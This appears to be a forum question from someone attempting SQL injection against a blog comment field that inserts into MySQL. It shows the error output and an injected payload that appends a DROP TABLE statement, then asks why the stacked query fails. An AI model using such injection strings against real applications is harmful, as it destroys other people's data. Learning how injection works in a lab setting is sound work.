I'm trying to exploit a SQL injection. The target has a comment field, which is used to INSERT data into a MySQL table.
I receive this error when I fill the field with a comma ':
Query: INSERT INTO blogs_table(blogger_name, comment, date) VALUES ('name', ''', now() ) (0) [Exception]
So I put this piece as input:
something', now()); DROP TABLE blogs_table;--
and this is the result:
errno: 1064
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DROP TABLE blogs_table;-- ', now() )' at line 1
client_info: mysqlnd 7.4.3
host_info: 127.0.0.1 via TCP/IP
) Query: INSERT INTO blogs_table(blogger_name, comment, date) VALUES ('name', 'something', now()); DROP TABLE blogs_table;-- ', now() ) (0) [Exception]
What exactly is wrong?